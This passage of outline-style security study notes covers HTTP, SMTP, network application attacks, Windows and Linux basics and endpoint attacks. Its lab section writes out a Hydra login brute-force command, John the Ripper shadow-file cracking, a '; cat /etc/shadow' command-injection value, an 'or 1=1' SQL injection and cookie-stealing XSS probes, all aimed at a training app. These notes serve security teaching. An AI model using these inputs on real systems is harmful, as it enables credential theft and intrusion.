          2. HTTP request method
            1. GET: retrieves data
            2. HEAD: retrieves data without response body
            3. POST: create data
            4. PUT: update data
            5. DELETE: deletes
          3. Common status code
            1. 100=continue
            2. 200=OK
            3. 301=Moved Permanently
            4. 302=Found
            5. 307=Temporarily Moved
            6. 401=Unauthorized (require authentication)
            7. 403=Forbidden
            8. 404=Not Found
            9. 407=Proxy Authenticated Required
            10. 500=Internal Server Error
          4. HTTP Cookies
            1. small piece of data that is sent from the web server and stored in the user’s web browser;
            2. remember stateful information
            3. Passed by using the Set-Cookie HTTP header field in the HTTP response, and the Cookie HTTP header in the HTTP request
          5. fields in the Set-Cookie HTTP header:
            1. Expires, Domain, Path
          6. HTTP Referer: referer header, which indicates the last page that the user was on (the page where the user clicked the link)
        5. HTTP Operations
          1. HTTP over SSL / TLS (TLS is preferable)
          2. provides authentication of the server
          3. prevent MITM attacks
        6. Web Scripting
          1. HTML
          2. XML: define styles of encoding
          3. CSS: define the styles of HTML and how it displayed to end users
          4. server side scripting
          5. client side scripting (JavaScript / VBscript)
        7. SQL Operations
          1. understand how to recognize SQL attack
          2. SQL injection
          3. Data Exfiltration Attacks: SELECT
          4. Data structure Attacks: UPDATE / ALTER
        8. SMTP Operations
          1. SPAM: flood of unsolicited emails and spreads virus
          2. Terms
            1. MTA / SMTP daemon: software agent eg. Outlook
          3. 3 parts: Envelope / Headers / Data
          4. Commands:
            1. Hello / EHLO
            2. MAIL FROM
            3. RCPT TO
            4. DATA
            5. QUIT
          5. 3 digit code in mail systemThe first digit denotes the success or failure of the SMTP command:
            1. 1 = command accepted but pending confirmation (example, 101 can’t open connection)
            2. 2 = success (example, 250 OK)
            3. 3 = okay so far (example, 354 go ahead, also called start mail input)
            4. 4 = temporary failure (example, 452 mailbox full)
            5. 5 = permanent failure (example, 550 user unknown)
            1. The second digit categorizes the result:
              1. 0 = syntax
              2. 1 = information
              3. 2 = connection
              4. 3 = unspecified
              5. 4 = unspecified
              6. 5 = mail system
            2. The third digit adds finer detail.
        9. Explore Network Applications (Lab)
          1. Sending email, and see how rich text and binary files can be encoded in emails
          2. SMTP commands are four characters long. Examples include HELOEHLOMAILRCPTDATARSET, and VRFY.
            1. he HELOcommand is for the original SMTP; the EHLO command is for the extended ESMTP;
          3. Send email in telnet session by command
            1. Enter EHLO [] into the SMTP session
            2. Compose the email
              1. MAIL FROM:<william@services.public>
                #250 2.1.0 Ok //SMTP would only respond with a 250 code, which basically means, “I accepted that, please continue.”; ESMTP adds the 3 decimal value code for more precision. 250 2.1.0 means “Sender e-mail address ok.”
              2. RCPT TO:<wendy@abc.public>: 250 code means “I accepted that, please continue.” The additional 2.1.5 indicates “Recipient e-mail address ok.”
              3. DATA: 354 response indicates that SMTP server is ready to receive the actual email message;
              4. To: wendy@abc.public
                From: King Willie III
                Subject: How are you?

                1. SMTP does no verify the address entered in FROM, thus, tricks occurred here and REPLY TO: ;
              5. Hi Wendy,
                This is a test message. I’m sending this manually! Can you believe it?
                Take Care,
              6. spool the data that you are sending, waiting for the period (.) on a blank line.
              7. code 250 2.0.0 indicates that the email message was accepted for delivery; This step does not terminate the SMTP session until the command QUIT. Multiple emails may be transmitted in a single session. After QUIT, the PuTTY window will immediately close.
            3. POSTFIX
              1. /etc/postfix/relay_recipients
                1. record domain which is allowed to forward to;
              2. /etc/postfix/transport
                1. allowed email will forward to;
            4. Examine HTML script (1st browser-side processing)
              1. HTML tags surround the appropriate content. Some tags are paired, such as you see here with <head>, </head>, <title>, </title>. Some tags start with a < tag and close with a /> tag, as you see here with the link and meta tags;
              2. <head> element of an HTML document contains the metadata;
              3. shortcut icon is also displayed on the browser tab;
              4. broke body in division by <div> tag;
            5. Examine CSS (2nd browser-side processing)
              1. numeruous background properties, which share the same specifications fpr different browsers;
              2. banner, navcontainer, and content divs
            6. Examine Javascript (3rd browser-side processing)
              1. jQuery is a library that uses base JavaScript functions to build commonly used higher-level functions
              2. The “min” distribution of jQuery is optimized to consume as little bandwidth as possible. As you can see, all unnecessary whitespace is removed from the code
            7. Examine PHP (server-side processing)
            8. Examine SQL
            9. Examine URL
              1. Protocol;Host;Port;Resource Path;Query
            10. HTTP Requests: GET and POST
              1. HTTP is a stateless protocol
        10. Challenge
      7. Understanding Common Network Application Attacks
        1. Passwords Attacks
          1. password guessing
          2. brute-force attacks
          3. dictionary attacks
          4. phishing attacks
          5. online password attack: a form of DoS attack by account lock out after repeated failed log in;
          6. offline password attack: make countless attempts to crack the password without being noticed;
          7. Password attack tools: Cain and Abel, John the Ripper, OphCrack, and L0phtCrack;
          8. Approaches:
            1. Lock the account or increase the delay between login attempts;
            2.  two-factor authentication
        2. Pass-the-Hash Attacks
          1. Window / Cisco store hashed passwords and compare them with user login;
          2. use the password hash to get authentication from remote system;
          3. Salting adds random data to the password before hashing it, and then store that salt value along with the hash;
          4. Rehashing makes the hash harder to crack;
          5. Rainbow table contains different password hash;
          6. NTLM (NT Lan Manager)
          7. Tools: MetaPilot, PS Exec, MSVCTL, PSH Toolkit;
          8. Countermeasures:
            1. Block inbound connections on workstations;
            2. Restrict and protect admin accounts;
        3. DNS-based Attacks
          1. DNS cache poisoning attacks
            1. Open DNS resolvers: reply query to anyone
            2. non-recursive
            3. Resource Records (RR): 32bit TTL
          2. DNS amplification and reflection attack: DDoS
            1. reduce by:
              1. upstream providers filters packets from downstream customers;
              2. discard packets with IP address not belonging to customer;
          3. DNS resource utilization attack
            1. CPU / memory / socket buffers -> system reboot
          4. Techniques such as:
            1. fast flux: numerous IP addresses that are associated with a single fully qualified domain name; changed with extremely high frequency; Botnet;
              1. hides the malicious server from being detected and results in the defenders being unable to find a single point to focus their efforts
            2. double IP flux
            3. domain generation algorithms (DGA): generate a different domain name in every iteration;
              1. Botnets
            4. Countermeasures
              1. Monitor the DNS log for suspicious activities such as DNS queries with long randomly generated domain
              2. Deploy a solution, such as Cisco OpenDNS: collect data and predict;
          5. Not as Open resolvers; capture and log DNS data; don’t use non authoritative DNS servers;
        4. DNS Tunneling
          1. Bot vs Botnet (receive CnC by the hacker)
            1. stealthy data exfiltration
            2. issue CnC traffic to bots on the network
          2. Block suspicious outbound connection
          3. Inspect and filter DNS, especially long DNS query;
            1. DNS replies from cyber criminal server contains malicious codes;
          4. Encoding methods include Base32 and Base64 encoding to avoid detection in DNS tunnel;
        5. Web-based Attacks
          1. Process “Drive-by Download“: infects a victim’s machine simply when the victim visits a website that is running malicious code;
            1. exploit kit scans the victim’s machine software such as the operating system, browser, Flash player, PDF player, or Java to find a security vulnerability that it can exploit. A web-based exploit kit typically uses a PHP script, and provides a management console to enable the cybercriminals to manage the attacks
          2. Angler Exploit Kit: associate many ransomware incidents
            1. Malvertising
          3. Pre-Click Malware
          4. Post-Click Malvertising
          5. Countermeasures
            1. Best security practices for web development
            2. OS, Browser updates
            3. web proxy
            4. Cisco OpenDNS
            5. Educate end users
        6. Malicious iFrames
          1. webpage within a webpage;
          2. attackers obscure java scripts
          3. detect iFrames within the HTTP packet
          4. Countermeasures
            1. Review packet through WireShark
            2. Not to use iFrames to embed in development
            3. Cisco OpenDNS: block the users from accessing malicious web sites
            4. Web Proxy block users from accessing malicious web sites
            5. Education
        7. HTTP 302 Cushioning
          1. HTTP response status code 302 Found is a common way of performing URL redirection
          2. Goals of HTTP 302 cushioning / iFrame: redirect to attacker’s site;
          3. CounterMeasures
            1. Secure solution of Web Proxy
            2. Education
        8. Domain Shadowing (with HTTP cushioning)
          1. steal credentials of domains > create sub-domains > redirect users;
            1. huge numbers of sub-domains and short
          2. Countermeasures
            1. secure accounts with strong authentication
            2. verify domain account periodically
        9. Command Injections
          1. vulnerable, unsafe input fields;  due to insufficient input validation;
          2. SQL injection and XSS
          3. Countermeasures
            1. IPS solution to detect and prevent injections
            2. developers should follow the best practices to perform proper user input validation
        10. SQL Injections
          1. Countermeasures
            1. Application developers should follow the best practices to perform proper user input validation, constrain, and sanitize the user input data
        11. Cross-Site Scripting (XSS) and Request Forgery
          1. XSS: steal all the sensitive data from the user’s cookies by scripts
          2. steal cookies
          3. Countermeasures
            1. OWASP CSRF prevention cheat sheet for the web application developers to follow:
            2. Educate end users—for example, how to recognize phishing attacks
        12. Email-based Attacks
          1. Homoglyphs are text characters that have shapes which are identical or similar to each other
        13. Explore Network Application Attacks
          1. By default, tail displays the last 10 lines in the file;
          2. Crack hash by John the Ripper in Linux
            1. john root.shadow.txt
            2. john root.shadow.txt –show
          3. use the tool Hydra to perform an online password attack
            1. hydra -l admin -P /usr/share/wordlists/metasploit/unix_passwords.txt http-post-form “/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In” -V
            2. ./
            3. online password attack at /var/log/apache2
          4. Command injection
            1. get root hash and use John: ; cat /etc/shadow
          5. Perform an SQL injection
            1. using the string ‘ or 1=1 –<space> in the Name field; it changes the query to an OR from an AND (which requires two conditions to match) ; double dash () indicates that the rest of the query is a comment and should be ignored by the SQL parser
              1. ‘ or 1=1 —<space> (especially for username).

                SELECT * FROM accounts WHERE username=” or 1=1 — ‘ AND password=’Presley’ -> 

                SELECT * FROM accounts WHERE TRUE

            2. Account access via cookie manipulation
              1. Cookie, small text file describing tags and values and is stored in browser’s data files. It can offload the need to store data on the server.
              2. facilitation of website customization themes, browsing history, and shopping carts;
              3. change value in cookie manager in Google Chrome;
            3. Explore reflected XSS
              1. Input JavaScript to test if vulnerable to reflected XSS:
                1. alert(“This is a test!”)
                2. alert(document.cookie)
            4. Explore persistent CSS
              1. when any other user views this blog entry, their cookie information will be harvested
        14. Challenge
      8. Understanding Windows Operating System Basics
        1. Windows OS history
          1. National Vulnerability Database.
        2. Windows OS architecture
          1. user mode: processes operate at lower system privileges than kernel mode processes to maintain the separation (protected memory space);
            1. Non-service processes (initiated by user activity, eg. logon services & smss)
            2. Service processes
            3. User applications
            4. OS environment support
          2. kernel mode:
            1. with the highest level of privilege so it can manage system CPU and memory resources;
            2. share the same memory space;
            3. To mitigate misbehaving process, kernel mode code signing, which means that drivers and critical system files must be signed by a cryptographic key from a public CA;
        3. Windows processes, threads, and handles
          1. applications: contains multiple process
          2. processes: contains multiple threads
          3. threads: system allocate process timer to threads
          4. objects: represents a resource
          5. handlers: a pointer to access objects / resources
        4. windows virtual memory address space
          1. paging files: to hold virtual memory
            1. page tble translate virtual address to physical address on the HDD
          2. size of the total addressable virtual memory space depend on: Windows version is 32-bit or 64-bit;
        5. Windows services
          1.  long-running executable applications that run in their own Windows sessions;
          2. Services Control Manager
        6. Windows file system overview
          1. File Allocation Table (FAT): file-size limitation, in USB media;
          2. HFS+, used on MacOS, enable long file names;
          3. Extended File System (EFS): Linux, EXT4, additional software for reading in Windows;
          4. New Technology File System (NTFS), supported by Windows and Linux, read only in Mac Os;
            1. NTFS alternate data streams
              1. echo "My ADS data." > myFile.txt:ADStest
              2. a way to hide data
              3. not easily visible
              4. difficult to detect
          5. partition boot sector occupies the first 16 sectors of the drive; points to the system bootstrap instructions and the location of the Master File Table (MFT)
        7. Windows file system structure
          1. file system paths, eg. (fully qualified path) C:\….
          2. base file name and file extension (determine application needed)
        8. Windows domains and local user accounts
          1. AD is a type of LDAP
        9. Windows graphical user interface
          1. start menu / quick launch icons / notification area / windows file explorer;
        10. Run as administrator
        11. Windows command line interface
          1. command option or parameters with “/
        12. Windows Powershell
          1. PowerShell scripts: sequences of PowerShell commands
          2. PowerShell functions: accept parameters; code snippets;
          3. Rich scripting environment
          4. Power shell environment
          5. object oriented language based on .NET framework
          6. bulk and reptitive operations / task automation
          7. aliases in powershell
          8. >start powershell
            1. Get-Service | Out-GridView
          9. import-module
          10. four PowerShell execution policy elements
            1. Restricted: completely restricts the use of PowerShell scripts on the system
            2. AllSigned: any script to execute must be digitally signed
            3. RemoteSigned: besides locally created, externally downloaded scripts must be digitally signed
            4. Unrestricted: no restrictions on running PowerShell scripts
          11. cmdlets: programs that are designed to interact with PowerShell
        13. Windows net command
          1. net help
          2. net config
          3. net use: mount file share
          4. net start: start a service
          5. net share
        14. Controlling startup services and executing system shutdown
          1. msconfig: system configuration
        15. Controlling services and processes
          1. task manager
          2. msconfig
        16. Monitoring system resources
          1. resmon.exe
        17. Windows boot processes
          1. BIOS (newer type EFI / UEFI)
            1. firmware identifies and initializes the hardware devices
            2. Runs POST
            3. Detects a valid system disk
            4. Reads MBR
            5. Starts bootmgr.exe
            6. Bootmgr.exe starts Winload.exe: program queries the system BIOS to get information about devices connected to the system
          2. OS Loader
            1. Loads essential system drivers
            2. Initializes the system
            3. Kernel begins executing
          3. OS Initialization
            1. Kernel initialization
            2. Plug and Play activity
            3. Service Start
            4. Logon
            5. Desktop initialization
          4. Registry hives
            1. HKEY_LOCAL_MACHINE: more vulnerable to be modified
            2. HKEY_CURRENT_USER
        18. Windows networking
          1. ping / nslookup / netstat
        19. Windows netstat command
          1. command line network utility
          2. netstat -r: routing info
          3. netstat -ans: -s for per-protocol statistics
          4. netstat -e: displays ethernet statistics
          5. netstat -p: protocol acronym
          6. netstat -abno: display processes listed in Task Manager with PID;
          7. netstat -pnob TCP: p for ports; n for addresses; o for owner process ID; b for executable involved;
        20. Accessing network resources with Windows
          1. net use to mount network resources
          2. UNC format: \\servername\sharename\file
          3. SMB worm: using file sharing
          4. NetBIOS are used to uniquely identify the servers hosting the remote resource
        21. Windows Registry (regedit.exe)
          1. hive: highest element of the hierarchy, store specific types of info.;
            1. HKEY_CURRENT_USER (HKCU): Stores data that is associated with the currently logged in user
            2. HKEY_USERS (HKU): Stores information about all the user accounts on the host
            3. HKEY_CLASSES_ROOT (HKCR): Stores information about file associations and object linking and embedding (OLE) registrations
            4. HKEY_LOCAL_MACHINE (HKLM): Stores system-related information
            5. HKEY_CURRENT_CONFIG (HKCC): Stores information about the current hardware profile
          2. central hierarchical database
          3. to configure the system for one or more users, applications, and hardware devices
          4. Registry keys are container objects
            1. REG_BINARY: numbers or Boolean values (on or off)
            2. REG_DWORD: Stores numbers greater than 32 bits or raw data
            3. REG_SZ: Stores string values in Unicode format.
        22. Windows Event Logs
          1. run as administrator
          2. eventvwr.exe
        23. Windows Management Instrumentation (WMI)
          1. a set of specf. for consolidating the management of devices and app in a network
          2. most useful in enterprise applications and administrative scripts
            1.  to retrieve the Windows user log in and log off security events from the Windows domain controller
          3. proper Windows guidelines to secure the WMI access
        24. Common Windows server functions
          1. DNS / DHCP /AD
        25. Common 3rd party tools
          1. PuTTy: remote access, ssh connection
          2. WinSCP: transfer files
          3. WireShark: capture traffic
          4. Syinternals: contains 70 tools (administrator privilege)
            1. Process Explorer
            2. Process Monitor (ProMon). report and monitor attempts to access the Windows registry. function (Check Virus Total)
            3. TCPView shows processes that are communicating with other hosts
        26. Explore the Windows OS (lab)
          1. A process must contain at least one thread
          2. Windows application / malware developer needs to understand processes, threads, handles, and the register
          3. netstat -a | find “EST”
            1. tasklist | find “5556”
        27. Challenge
      9. Understanding Linux Operating System Basics
        1. History and benefits of Linux
          1. Linus Torvalds
          2. GNU public licensing
        2. Linux Architecture
          1. Linux kernel, heart of OS
          2. Distributions: application packages from different brands
          3. Abstraction: provide interfaces to each layer and how one layer will work are hidden from the other layers
            1. Benefits of abstraction:
              1. simplifies software design because developers do not have to worry about how to interact with aspects already handled by other software components;
              2. Access to the inner workings of a layer is limited to what the layer’s interface provides for communication;
          4. User space:
            1. Components: GUI / User Applications / Command Line Interface / Services;
            2. describes the system memory made available to run user processes;
            3. Interaction between the kernel and user space is performed through function calls and programming interfaces;
          5. Kernel space: System Calls / Process Management / Device Drivers / Memory Management;
            1. A section of the system’s main memory is reserved for the kernel to use;
              1. manages the memory allocations for each running process
              2. determines which processes can access the CPU;
              3. interface between the user-space processes and the hardware
          6. hardware: Main Memory / Network Hardware / CPU / Disks
            1.  kernel communicates with system hardware through device drivers;
            2. Kernel:
              1. mapping the virtual address space of the process to the physical address space of the main memory
              2. must load and unload special memory, which are called registers, within the CPU;
                1.  for extremely fast computation and storage;
                2. context switching is implemented to temporarily unload the registers;
        3. Linux file system overview
          1. /tmp: Stores temporary files and used as a workspace by applications; store malware by attackers, often as the first stage of an attack;
          2. /home: contain private and sensitive personal information (like configuration files with password, SSH private identity keys, and user files);
          3. /dev, concept of devices being represented as files
            1. Block. devices that process data in fixed chunks, eg. storage devices;
            2. Character. Devices that work with data streams, eg. /dev/null or printers;
            3. Pipe / “named pipe”. data stream is directed to another process;
            4. Sockets: not usually found in /dev, used for interprocess communication such as network communication
            5. ls -la in  /dev, c for character type, b for block type
          4. /usr: store user-space programs and data;
          5. application execution: ./new-app
          6. cd ~  ,represents the current user’s home directory
          7. Fully Qualified VS Relative File Reference
            1. relative reference lets you specify a location relative to some starting point other than root;
        4. Basic file system navigation and management commands
          1. commands:
            1. cd. change directory
              1. pwd to display present location;
            2. cp: copy
            3. mv: move
        5. File properties and permissions
          1. ls-l
            1. 1st character: – for regular file; d for directory; c or character, b for block;
            2. Permissions: 9 characters: first set for user, 2nd for group, 3rd for all;
            3. Links. number of hard links to the file or for directories. represents the number of directories that it contains, including the current directory (.) and the parent directory (..)
            4. R for read; W for write; X for execute;
            5. Linux treats file permissions as a hierarchy. For example, without execute permissions to the directory, would not open the files that are inside;
        6. Editing file properties
          1. chmod 766 <filename>: rwxrw-rw-
          2. chmod u+R MyFile.txt
          3. chmod ug+rw MyFile.txt
          4. chmod go+r-w MyFile.txt
          5. chmod a=r MyFile.txt
        7. Root and sudo
          1. granular basis / logging
          2. sudo vi /etc/hosts: prompted for password and a five-minute session;
        8. Disks and File Systems
          1.  Partition tables contain the code that is required to boot a host and they outline where disk partitions start and end; (app eg.  partedgpartedfdisk, and gdisk)
          2. MBR is limited to four partitions on a disk; a disk may only have one MBR;
          3. GPT remove limitations on disk size and no. of partitions; and replicates to backup partitions;
          4. sudo parted -l
            1. list partition table information
          5. Extended File System (ext): native for Linux; latest at ext4;
          6. FAT: older Microsoft and USB storage devices;
          7. ISO 9660 and JOLIET: file system std for optical media;
          8. HFS+: file system for Apple systems running OS X;
          9. Swap
          10. /etc/fstab
            1. UUID for tracking instead of device name
          11. mount -t <file type><device name> <mount point>
        9. System Initialization
          1. General boot process
            1. Hardware checks (H)
            2. Device bus discovery (D)
            3. Device discovery (D)
            4. Kernel sub-system initializes (K)
            5. Root file system mounts (R)
            6. Start user processes (U) 
          2. boot loader (interact with BIOS / UEFI)
            1. BIOS/UEFI findS the kernel on the startup disk and load the kernel into memory
              1. LILO
              2. GRUB
            2. /proc/cmdline: BOOT_IMAGE=
          3. Initialization process
            1. System V init: init
              1. use /etc/inittab
            2. Systemd: newer and become as standard
              1. benefits: it can control other initialization behaviors such as mounting file systems and start in parallel;
              2. use /etc/systemd
          4. Run Levels: 0 to 6
            1. Each level is a directory that contains start and stop scripts; S for startup scripts and K stands for stopping scripts; eg. rc.1
            2. Level 0: halts
            3. Level 1-2: reserved
            4. Level 3: starts without GUI
            5. Level 5: startS with GUI
        10. Emergency/Alternate Startup Options
          1. Single User (Level 1)
            1. boot files from disk; thus not for situations if system hacked or for forensic purpose;
            2. Enter Single user mode in GRUB
              1. left shift key
              2. select desired kernel with recovery option;
          2. Live CD (compromised, or when a forensic analysis)
        11. Shutting Down the system
          1. command
            1. shutdown
              1. -h for halt
              2. -r for reboot
              3. hh:mm as 24-hour format
              4. +m for number of minutes from the command was issued
              5. now
            2. systemctl: for systemd
              1. systemctl poweroff
              2. systemctl reboot
        12. System Processes
          1. Processes
            1. PID
            2. Process thread, component of a process, unit that is capable of sharing the resources that are allocated to a process;
            3. Single-threaded process: composed of one thread
            4. Multi-threaded process: consists more than one thread
              1. run in parallel
              2. TIDs
          2. Linux process creation
            1. fork-and-exec mechanism
              1. When a (parent) process makes a fork call, a new (child) process with a new PID is created;
              2.  the child process will then make an exec call that facilitates replacing a process with an entirely new program;
            2. Parent process receive PID of the child process from folk call, while the child process receives 0;
            3. Monitoring
              1. top
                1. 1st line: load of CPU in 1, 5, 15 minutes;
                2. 3rd row: CPUs utilization. us for user space proceess; sy for system/kernel processes;
                3. NI as nice value. -20 (highest) to 20.
                4. Status: Z (zombie process) completed processes but not yet removed from kernel’s process table;
              2. ps
                1. -f for detailed information
                2. -e for all user processes
                3. -ef for options of -e and if
                4. -fC sshd for filtering process that is related to sshd;
                5. ps -ef | grep ssh.*
              3. lsof: list the files / folders that are currently open in the system (need Superuser privilege)
                1. sudo lsof /var/log/syslog: know which processes are using the syslog;
                2. sudo lsof +D /var/log. list the processes that are accessing log files in a directory;
                3. sudo lsof -p 892.  specify a PID number;
                4. sudo lsof -i TCP -s TCP:LISTEN
              4. vmstat 2 (every 2 seconds) for virtual memory
              5. iostat 2 for I/O resources
        13. Interacting with Linux
          1. GUI: X11 / X environment
            1. Gnome / KDE / Mate / XFCE: desktop layouts, usages and widgets of UX;
          2. Shell
            1. bash (Bourne-Again shell) – oldest, and broadest compatibility; most widely used;
            2. ksh (Korn shell)
            3. csh (C shell)
        14. Linux command shell concepts
          1. Environment variables and Shell variables
            1. Environment variables: available system wide; view all by env;
            2. Shell variables: only available in the current shell; create shell variables at any time;
              1. $ MYVAR=”abc123″
              2. $ echo $MYVAR
              3.  Shell variables can be made available to other shells, by using export command;
            3. $PATH:  locations searched for commands you wish to execute
          2. General command structure
            1. . (single dot): Represents the current directory which is also known as a self-referential directory, especially for file execution;
          3. STDIN, STDOUT, and STDERR
            1. cat: cat “this is a test” > test.txt
            2. echo: echo $PATH > path.txt
            3. echo “add more” >> path.txt
            4. cat myfile.txt 2> file_output.log
              1. contents of myfile.txt will be displayed on the terminal;
              2. Any errors that are associated with displaying the file are sent to file_output.log, it is because number 2 references the STDERR stream;
        15. Piping command output (|)
          1. piping output to next command instead of STDOUT
          2. running multiple commands
            1. ./configure && make && make install. execute in sequence;
        16. Other Useful command line tools
          1. history
            1. !. execute line no. from history: eg. !735
            2. !!.  the last command that you ran.
            3. sudo !!
          2. less (f for forward one page; b for backward one page; / for search; q to quit)
          3. history | less
          4. awk: text processing
            1. eg. ps -ef | grep ssh | awk ‘{print $1 “\t” $2 “\t” $8}’
          5. sed: stream editing tool that performs the action you configure on lines of text
            1. string substitutions
            2. eg. echo “left” | sed -e ‘s/left/right/’
            3. Lines deletion:
              1. sed –e ‘1d ; 3d’ names.txt
              2. sed -e ‘1,3d’ names.txt
              3. sed -e ‘/mr/d’ names.txt
            4. Delete blank line
              1. sed -e ‘/^$/d’ names.txt
          6. vi:
            1. command mode
              1. w for write
              2. q for quit
              3. ! to override the warning
              4. :wq for write and quit
              5. Delete
                1. dd to delete the entire line
                2. dw to delete from location of the cursor
              6. Copy/paste
                1. yy for yank a line
            2. insert mode: Esc to exit
          7. nano: simple and easy text editor
        17. overview of secure shell protocol
          1. ssh <username>@<remote host>
            1. exit
          2. SCP (Secure Copy Protocol) over SSH
        18. networking
          1. ifconfig -a
            1. lo for loopback interface
          2. netstat -rn,  displays the routing table with numeric IP addresses
          3. ping / ssh
        19. managing services in SysV environments
          1. “bouncing” the service:  stop and start the service so the updated configurations can be read;
            1. Systemd
              1. ps -ef | grep ftp
              2. sudo service vsftpd stop / start / restart
              3. systemctl
                1. sudo systemctl start vsftpd
                2. reload without restart.
                  1. sudo systemctl reload vsftpd
            2. old
              1. sudo ./cups restart
        20. viewing network traffic
          1. lsof: list of open files / connections;
          2. netstat
            1. -t: show TCP connections
            2. -l: show connection in a listening state
            3. -n: displays hostnames and ports numerically
            4. -p: identifies the associated processes
            5. -6: IPv6 connections
        21. Name Resolution: DNS
          1. /etc/resolv.conf
          2. /etc/hosts: first DNS mechanism and soon be replaced
          3. /etc/nsswitch.conf: configure where various elements of the operating system go to fetch the information they need such as user information,
        22. testing name resolution
          1. nslookupnon-authoritative answer message means that the DNS server that gave you the response is not the server for the domain you looked up;
          2. whois retrieve detailed information about the owner of a registered IP 
        23. viewing network traffic
          1. tcpdump:
            1. capture specific traffic for passive analysis
            2. require root level permission
            3. eg. sudo tcpdump –i ens33 –Xnns 0 host
              1. -i: interface
              2. -X: outputs in both hex and ascii
              3. -nn: outputs addresses and ports in numeric format;
              4. -s: snap length
            4. eg. sudo tcpdump –i ens33 –s 0 host and port 21 –w capture.pcap
        24. System logs
          1. Syslogd / rsyslogd process
          2. /var/log/messages or /var/log/syslog
          3. Config files:
            1. /etc/syslog.conf or /etc/rsyslog.conf
          4. forward to a remote syslog server or SIEM tool
          5. Levels
            1. Debug
            2. Info
            3. Notice: some attention
            4. Warn
            5. Err: error condition
            6. Crit: critical condition
            7. Alert: requires immediate attention
            8. Emerg
        25. Configuring Remote syslog (port: 514)
          1. restart logging service after configuration change!!
          2. UDP: *.* @<remote host name or IP address>:<port>
          3. TCP: *.* @@<remote host name or IP address>:<port>
          4. *.emerg @<>:<10514>
          5. logger command
            1. logger command lets you manually make entries into log files
            2. logger –p –n –P 10514 –UDP “My logging test”
        26. Running software on Linux
          1. 1st: structured in a format that either allows it to run on its own or run through an interpreter
          2. 2nd: execute bit set in its permission properties
          3. Source code -> (complied with a compiler application) -> binary executable files;
          4. Compiler: GNC C compiler, gcc compiler
            1. Source: eg. .c extension
            2. Object files (.o): essentially libraries of compiled (binary) code
            3. Shared object files (.so)
            4. header files (.h): contains function declarations, macro definitions, constants, and system variables
          5. autotools: author of the application to create a series of scripts to automate the compilation and installation process
            1. decompress
            2.  Scripts
              1. configure
              2. make
              3. make install
        27. Executables vs. Interpreters
          1. Executable files are binary files able to run CPU code and perform tasks independently;
          2. interpreter is an application that reads commands from a scripts and performs the tasks on behalf of the source file
          3. bash: (.sh) begins with #!/bin/sh
          4. Perl: (.pl); begins with #!/usr/bin/perl
          5. Python: (.py); begins with #!/usr/bin/python3
        28. Using package managers to install software in Linux
          1. Package formats
            1. Red Hat Package Management (RPM)
            2. .deb: Debian-based installations, including Ubuntu
          2. Package managers
            1. yum: primarily on Redhat-based installations
              1. yum install <package name>
            2. apt:  Debian-based Linux installation
              1. apt-get install <package name>
        29. system applications
          1. Web by Apache
            1. /var/log/apache2/access.log
          2. Database
            1. NoSQL
              1.  not rely on strict data structures
              2. require large storage capabilities but are faster at data retrieval
            2. MySQL
              1. Error log: /var/log/mysql/mysql_error.log
              2. General query log: /var/log/mysql/mysql.log
              3. Slow queries: /var/log/mysql/mysql-slow.log
        30. Lightweight Directory Access Protocol (LDAP)
          1. protocol designed to store information about an organization; X.500 standards;
          2. DN: distinguished name for entity
          3. cn is known is the canonical name
          4. dc components are known as domain components
          5. OpenLDAP with slapd; log /var/log/slapd
        31. Explore the Linux OS
          1. Shell – command processor
          2. see the current alias definitions, enter the command alias
          3. .file as hidden as default;
          4. cd ~ for home directory;
          5. echo $PATH
            1. $PATH will direct the system to look in these five directories for any entered command
          6. which ls: where the system will find the executable command
          7. ls file?-2 / ls file*2
          8. rm testdir/* OR rm -r testdir
          9. groups
          10. cd ~tom
          11. With sudo group, user could elevate themselves to a super user with the sudo -i command
          12. variable with $, eg. $USER
          13. piping with cat (> / >>), |, less, more
          14. Word count: wc auth.log
          15. grep auth.log
          16. ps u: includes all processes that are launched by the current user
            1. ps u –forest: display in parent child format
            2. ps aux –forest | grep apache
          17. netstat
            1. netstat -ten
            2. netstat -tul: all the TCP ports and UDP ports
            3. netstat -rn: displays routing table
        32. Challenge
      10. Understanding Common Endpoint Attacks
        1. Classify attacks, exploits, and vulnerabilities
          1. Clients:
            1. do not receive the same amount of attention as servers
            2. susceptible to social engineering attack
          2. vulnerability: a flaw or weakness
          3. exploitsmethod of leveraging a vulnerability to do harm;
            1. local exploits: access and lead to privilege escalation;
            2. remote exploits: over the network without any prior access
          4. attack: attempt to exploit a vulnerability
          5. CVSS (Common Vulnerability Scoring System v3.0)
            1. qualitative representation
            2. 8 metrics
              1. Attack vector: Network / Adjacent / Local / Physical;
              2. Attack complexity: Low / High
              3. Privileges Required: Non / Low / High
              4. User Interaction: None / Required
              5. Scope: Unchanged / Changed
              6. Confidentiality: None / Low / High
              7. Integrity: None / Low / High
              8. Availability: None / Low / High
        2. Buffer overflow (client side attacks)
          1. service accepts input whose ranges within a certain size but does not verify the size of input upon reception;
          2. input > write to memory, filling up the associated buffer and also overwriting adjacent memory > may corrupt the system and cause it to crash;
            1. Results: Corruption of data / Crash of App / Execution of malicious code;
        3. Malware
          1. Common types:
            1. Viruses. propagates by inserting a copy of itself as part of program; need human help such as USB devices;
            2. Wormsstandalone software and do not require a host program to self-replicate functional copies; trick others to execute;
            3. Trojan horsesHidden malicious functionality or backdoor within existing program
          2. APTs (Advanced Persistent Threats)
            1. set of continuous hacking processes
            2. 6 Stages
              1. Initial Compromise
              2. Escalation of privileges
              3. Internal reconnaissance
              4. Lateral propagation, compromise other systems on track towards goal
              5. The end goal of the attacker, for example, maybe to exfiltrate sensitive data out
              6. Mission complete
        4. Reconnaissance
          1. attempt to gather information of target before intrusive attack;
            1. eg. dig, nslookup, and whois;
            2. list of hosts and port scan
          2. Vulnerability scanners, eg. Nessus and OpenVAS;
        5. Gaining Access and Control
          1. techniques
            1. phishing
            2. brute force
            3. password spraying: try one or two common before lockout;
              1. enforcing strong password
            4. bonet
              1.  infects computers by sending them malicious bots that is self-propagating malware;
              2. a bot can log keystrokes, gather passwords, capture and analyze packets, gather financial information, launch DoS attacks, relay spam, and open back doors;
              3. attacker user Command-and-Control server to control bonet;
        6. Gaining Access Via Social Engineering
        7. Social Engineering Example: Phishing
          1. Spear phishing: target to smaller groups;
          2. Whaling: increasing profiling to top executives;
          3. Pharming: inject / compromising name services;
          4. Watering hole: Only members of the target group are attacked; compromised web server to target select groups;
          5. Vishing: uses voice and the phone system as its medium instead of email;
          6. Smishing: uses SMS texting as the medium;
        8. Gain access via web-based attacks
          1. client-side web-based attacks involves manipulating the URI
          2. URI
